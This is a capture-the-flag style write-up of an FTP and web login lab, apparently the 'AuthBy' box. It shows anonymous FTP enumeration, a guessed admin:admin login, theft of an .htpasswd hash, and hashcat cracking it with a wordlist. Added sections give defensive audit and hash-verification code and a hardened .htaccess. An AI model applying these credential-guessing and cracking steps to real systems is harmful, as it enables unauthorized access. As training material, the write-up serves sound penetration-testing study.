FTP
Nmap discovered an FTP server on target port 21.
The running service is zFTPServer 6.0 build 2011-10-17
Null Session
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/authby]
└─$ ftp $IP
Connected to 192.168.203.46.
220 zFTPServer v6.0, build 2011-10-17 14:25 ready.
Name (192.168.203.46:kali): anonymous
331 User name received, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
The target FTP instance allows anonymous access
ftp> ls
229 Entering Extended Passive Mode (|||2049|)
150 Opening connection for /bin/ls.
total 9680
---------- 1 root root 5610496 Oct 18 2011 zFTPServer.exe
---------- 1 root root 25 Feb 10 2011 UninstallService.bat
---------- 1 root root 4284928 Oct 18 2011 Uninstall.exe
---------- 1 root root 17 Aug 13 2011 StopService.bat
---------- 1 root root 18 Aug 13 2011 StartService.bat
---------- 1 root root 8736 Nov 09 2011 Settings.ini
dr-xr-xr-x 1 root root 512 Mar 01 03:22 log
---------- 1 root root 2275 Aug 09 2011 LICENSE.htm
---------- 1 root root 23 Feb 10 2011 InstallService.bat
dr-xr-xr-x 1 root root 512 Nov 08 2011 extensions
dr-xr-xr-x 1 root root 512 Nov 08 2011 certificates
dr-xr-xr-x 1 root root 512 Aug 03 2024 accounts
226 Closing data connection.
This appears to be the installation directory of the zFTPServer service itself.
ftp> less Settings.ini
Access denied
ftp> less InstallService.bat
Access denied
ftp> put test
local: test remote: test
200 EPRT Command successful.
550 Access denied
However, neither read nor write access is granted in this directory.
ftp> cd extensions
250 CWD Command successful.
ftp> ls
229 Entering Extended Passive Mode (|||2077|)
150 Opening connection for /bin/ls.
total 0
226 Closing data connection.
ftp> cd certificates
250 CWD Command successful.
ftp> ls
229 Entering Extended Passive Mode (|||2079|)
150 Opening connection for /bin/ls.
total 0
226 Closing data connection.
ftp> ls
229 Entering Extended Passive Mode (|||2075|)
150 Opening connection for /bin/ls.
total 21043
---------- 1 root root 136 Mar 30 2020 stor-2020-03-30.log
---------- 1 root root 386 Mar 30 2020 retr-2020-03-30.log
---------- 1 root root 0 Mar 01 03:22 log-2025-02-28.log
---------- 1 root root 370 Aug 03 2024 log-2024-08-02.log
---------- 1 root root 574 Jul 10 2020 log-2020-07-09.log
---------- 1 root root 71178 Mar 30 2020 log-2020-03-30.log
---------- 1 root root 930 Mar 27 2020 log-2020-03-26.log
---------- 1 root root 568 Mar 25 2020 log-2020-03-24.log
---------- 1 root root 568 Mar 05 2015 log-2015-03-05.log
---------- 1 root root 1134 Feb 28 2015 log-2015-02-27.log
---------- 1 root root 572 Nov 03 2014 log-2014-11-03.log
---------- 1 root root 1712 May 22 2013 log-2013-05-22.log
---------- 1 root root 2440 Jun 12 2012 log-2012-06-11.log
---------- 1 root root 1142 May 25 2012 log-2012-05-24.log
---------- 1 root root 208 Dec 15 2011 log-2011-12-15.log
---------- 1 root root 944 Dec 15 2011 log-2011-12-14.log
---------- 1 root root 1150 Dec 14 2011 log-2011-12-13.log
---------- 1 root root 208 Dec 13 2011 log-2011-12-12.log
---------- 1 root root 6877584 Nov 09 2011 log-2011-11-09.log
---------- 1 root root 14575458 Nov 09 2011 log-2011-11-08.log
226 Closing data connection.
The log directory contains a large number of log files.
Username Disclosure
ftp> cd accounts
250 CWD Command successful.
ftp> ls
200 EPRT Command successful.
150 Opening connection for /bin/ls.
total 4
dr-xr-xr-x 1 root root 512 Aug 03 2024 backup
---------- 1 root root 764 Aug 03 2024 acc[Offsec].uac
---------- 1 root root 1032 Mar 01 03:31 acc[anonymous].uac
---------- 1 root root 926 Aug 03 2024 acc[admin].uac
226 Closing data connection.
ftp> cd backup
250 CWD Command successful.
ftp> ls
200 EPRT Command successful.
150 Opening connection for /bin/ls.
total 4
---------- 1 root root 764 Jul 10 2020 acc[Offsec].uac
---------- 1 root root 1030 Jul 10 2020 acc[anonymous].uac
---------- 1 root root 926 Jul 10 2020 acc[admin].uac
226 Closing data connection.
The accounts directory discloses user names through the acc[...].uac file names:
Offsec
anonymous
admin
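The findings above (anonymous login, a listing of the server's own installation directory, and user names leaking from the account file names) can be turned into a repeatable check. The following script is an added example for this writeup, not code from the original notes or from zFTPServer: it logs in anonymously with ftplib, parses the UNIX-style LIST output, and reports entries that belong to the server installation or to web-server authentication rather than to a public share. The sensitive-name list, the placeholder anonymous password and the host argument are assumptions; the sample listing is constructed from the directory names seen in this writeup.

```python
"""Audit an FTP service for anonymous exposure of server-internal files.

Added example for this writeup, not part of the original notes or of zFTPServer.
The sensitive-name list and the host/port arguments are illustrative assumptions;
SAMPLE_LISTING is constructed from the entries shown in the writeup.
"""
import re
from ftplib import FTP, error_perm

# Names that should never be visible to an anonymous session: they belong to the
# server installation or to web-server auth, not to a public share (assumed list).
SENSITIVE_NAMES = {"settings.ini", "accounts", "log", "certificates",
                   ".htpasswd", ".htaccess"}

# zFTPServer account files are named acc[<user>].uac; capture the user name.
ACCOUNT_FILE_RE = re.compile(r"^acc\[(?P<user>[^\]]+)\]\.uac$")

# Constructed sample of a UNIX-style LIST response, mirroring the writeup's listing.
SAMPLE_LISTING = [
    "---------- 1 root root 8736 Nov 09 2011 Settings.ini",
    "dr-xr-xr-x 1 root root 512 Mar 01 03:22 log",
    "dr-xr-xr-x 1 root root 512 Aug 03 2024 accounts",
    "---------- 1 root root 764 Aug 03 2024 acc[Offsec].uac",
    "---------- 1 root root 926 Aug 03 2024 acc[admin].uac",
]


def parse_listing(lines):
    """Return (is_dir, name) tuples from UNIX-style LIST output lines."""
    entries = []
    for line in lines:
        # perms, links, owner, group, size, month, day, time-or-year, name
        parts = line.split(None, 8)
        if len(parts) < 9:
            continue  # "total N" and status lines carry no entry
        entries.append((parts[0].startswith("d"), parts[8]))
    return entries


def find_exposures(lines):
    """Classify a listing into sensitive names and disclosed account user names."""
    exposed, users = [], []
    for _is_dir, name in parse_listing(lines):
        if name.lower() in SENSITIVE_NAMES:
            exposed.append(name)
        match = ACCOUNT_FILE_RE.match(name)
        if match:
            users.append(match.group("user"))
    return {"exposed": exposed, "users": users}


def audit_anonymous(host, port=21, timeout=10):
    """Log in anonymously and report exposures; None means anonymous was refused."""
    ftp = FTP()
    ftp.connect(host, port, timeout=timeout)
    try:
        ftp.login("anonymous", "audit@example.com")  # placeholder anonymous password
    except error_perm:
        return None  # anonymous login correctly refused: nothing to report
    lines = []
    ftp.retrlines("LIST", lines.append)
    ftp.quit()
    return find_exposures(lines)


if __name__ == "__main__":
    import sys
    # With a host argument the live service is audited; otherwise the sample is used.
    report = audit_anonymous(sys.argv[1]) if len(sys.argv) > 1 else find_exposures(SAMPLE_LISTING)
    print(report)
```

A non-empty `exposed` list or any `users` entry means the anonymous account is rooted in the server's installation directory instead of a dedicated, empty share; the fix on the server side is to point the anonymous account at such a share (or disable it), and the check can be rerun to confirm the listing comes back clean.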
admin
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/authby]
└─$ ftp admin@$IP
Connected to 192.168.203.46.
220 zFTPServer v6.0, build 2011-10-17 14:25 ready.
331 User name received, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
After some trial and error, I found the password of the admin user: admin
ftp> pwd
Remote directory: /
ftp> ls
229 Entering Extended Passive Mode (|||2133|)
150 Opening connection for /bin/ls.
total 3
-r--r--r-- 1 root root 76 Nov 08 2011 index.php
-r--r--r-- 1 root root 45 Nov 08 2011 .htpasswd
-r--r--r-- 1 root root 161 Nov 08 2011 .htaccess
226 Closing data connection.
ftp> put test
local: test remote: test
229 Entering Extended Passive Mode (|||2137|)
150 File status okay; about to open data connection.
0 0.00 KiB/s
226 Closing data connection.
ftp> ls
229 Entering Extended Passive Mode (|||2138|)
150 Opening connection for /bin/ls.
total 3
-r--r--r-- 1 root root 0 Mar 01 05:57 test
-r--r--r-- 1 root root 76 Nov 08 2011 index.php
-r--r--r-- 1 root root 45 Nov 08 2011 .htpasswd
-r--r--r-- 1 root root 161 Nov 08 2011 .htaccess
226 Closing data connection.
This appears to be the web root directory, and write access is granted.
index.php
ftp> more index.php
<center><pre>Qui e nuce nuculeum esse volt, frangit nucem!</pre></center>
This is the same riddle found in one of the headers on the web server.
.htpasswd
ftp> more .htpasswd
offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0
The .htpasswd file contains the credential hash of the offsec user.
Password Cracking
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/authby]
└─$ hashcat --show offsec.hash
1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR) | FTP, HTTP, SMTP, LDAP Server
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/authby]
└─$ hashcat -a 0 -m 1600 offsec.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
Host memory required for this attack: 3 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0:elite
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1600 (Apache $apr1$ MD5, md5apr1, MD5 (APR))
Hash.Target......: $apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0
Time.Started.....: Fri Feb 28 22:54:03 2025 (1 sec)
Time.Estimated...: Fri Feb 28 22:54:04 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 46891 H/s (6.89ms) @ Accel:64 Loops:500 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 25344/14344385 (0.18%)
Rejected.........: 0/25344 (0.00%)
Restore.Point....: 24576/14344385 (0.17%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:500-1000
Candidate.Engine.: Device Generator
Candidates.#1....: 280690 -> 360360
Hardware.Mon.#1..: Util: 69%
Started: Fri Feb 28 22:53:46 2025
Stopped: Fri Feb 28 22:54:06 2025
The password hash of the offsec user cracked to: elite
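The hash in .htpasswd and the hashcat result above can be tied together offline. The following Python is an added example for this writeup, not code from the original notes or from Apache: it implements the `$apr1$` scheme (Apache's md5-crypt variant, hashcat mode 1600) with nothing but hashlib, and verifies a candidate password against an htpasswd line. The hash line and the recovered password "elite" are the ones shown in the writeup; the function and variable names are my own.

```python
"""Verify an Apache htpasswd $apr1$ (md5apr1, hashcat mode 1600) entry offline.

Added example for this writeup; not code from the original notes or from Apache.
The algorithm is Apache's md5-crypt variant: magic "$apr1$", 1000 rounds and a
permuted base64 encoding. The htpasswd line below is the one from the writeup.
"""
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$apr1$"
HTPASSWD_LINE = "offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0"  # from the writeup


def _to64(value, count):
    """Emit `count` characters of the crypt-style base64 alphabet, low bits first."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def apr1_md5(password, salt):
    """Compute the $apr1$ hash of `password` with an up-to-8-character `salt`."""
    pw, sl = password.encode(), salt[:8].encode()
    # Outer context: password, magic, salt ...
    ctx = hashlib.md5(pw + MAGIC + sl)
    # ... then as many bytes of MD5(pw + salt + pw) as the password is long.
    alt = hashlib.md5(pw + sl + pw).digest()
    pl = len(pw)
    while pl > 0:
        ctx.update(alt[:min(16, pl)])
        pl -= 16
    # One byte per bit of the password length: NUL for a set bit, pw[0] otherwise.
    i = len(pw)
    while i:
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    # 1000 strengthening rounds mixing password, salt and the running digest.
    for r in range(1000):
        c = hashlib.md5()
        c.update(pw if r & 1 else final)
        if r % 3:
            c.update(sl)
        if r % 7:
            c.update(pw)
        c.update(final if r & 1 else pw)
        final = c.digest()
    # Apache's permuted encoding of the 16 digest bytes into 22 characters.
    enc = (_to64((final[0] << 16) | (final[6] << 8) | final[12], 4)
           + _to64((final[1] << 16) | (final[7] << 8) | final[13], 4)
           + _to64((final[2] << 16) | (final[8] << 8) | final[14], 4)
           + _to64((final[3] << 16) | (final[9] << 8) | final[15], 4)
           + _to64((final[4] << 16) | (final[10] << 8) | final[5], 4)
           + _to64(final[11], 2))
    return "$apr1$" + salt[:8] + "$" + enc


def verify_htpasswd(line, password):
    """Check a 'user:$apr1$salt$hash' htpasswd line against a candidate password."""
    user, stored = line.split(":", 1)
    parts = stored.split("$")  # ['', 'apr1', salt, hash]
    if len(parts) != 4 or parts[1] != "apr1":
        raise ValueError("not an $apr1$ entry for user " + user)
    return hmac.compare_digest(apr1_md5(password, parts[2]), stored)


if __name__ == "__main__":
    print(verify_htpasswd(HTPASSWD_LINE, "elite"))  # True for the writeup's hash
```

The 1000 MD5 rounds are the only work factor in this scheme, which is why hashcat runs it at tens of thousands of guesses per second on a CPU and a dictionary word falls in a second. Apache's `htpasswd -B` switches the entry to bcrypt, which Apache 2.4 accepts in AuthUserFile, and the password file itself should live outside the document root rather than at `c:\wamp\www\.htpasswd` where the FTP admin account could read it.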
.htaccess
ftp> more .htaccess
AuthName "Qui e nuce nuculeum esse volt, frangit nucem!"
AuthType Basic
AuthUserFile c:\\wamp\www\.htpasswd
<Limit GET POST PUT>
Require valid-user
</Limit>
The .htaccess file reveals that the cracked credential of the offsec user is for the web server.
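One caveat a reviewer of this .htaccess would raise: `<Limit GET POST PUT>` applies `Require valid-user` only to the listed methods (HEAD is covered together with GET), so any other method reaches the resource without authentication. Apache's own documentation advises against placing access control inside `<Limit>` for exactly this reason. The fragment below is an added example, not the target's configuration: it keeps the same Basic authentication but leaves the `Require` unconditional, and moves the password file outside the document root (the `C:/wamp/private/` path is an assumption chosen for illustration).

```apache
# Added hardened form of the .htaccess seen above; not the target's own file.
AuthName "Qui e nuce nuculeum esse volt, frangit nucem!"
AuthType Basic
# Assumed location outside the served tree so neither HTTP nor the FTP share exposes it.
AuthUserFile "C:/wamp/private/.htpasswd"
# No <Limit> wrapper: every HTTP method now requires a valid user.
Require valid-user
```

If some methods really must be treated differently, `<LimitExcept GET>` is the construct that restricts everything except the named methods, which fails closed for methods the author did not anticipate.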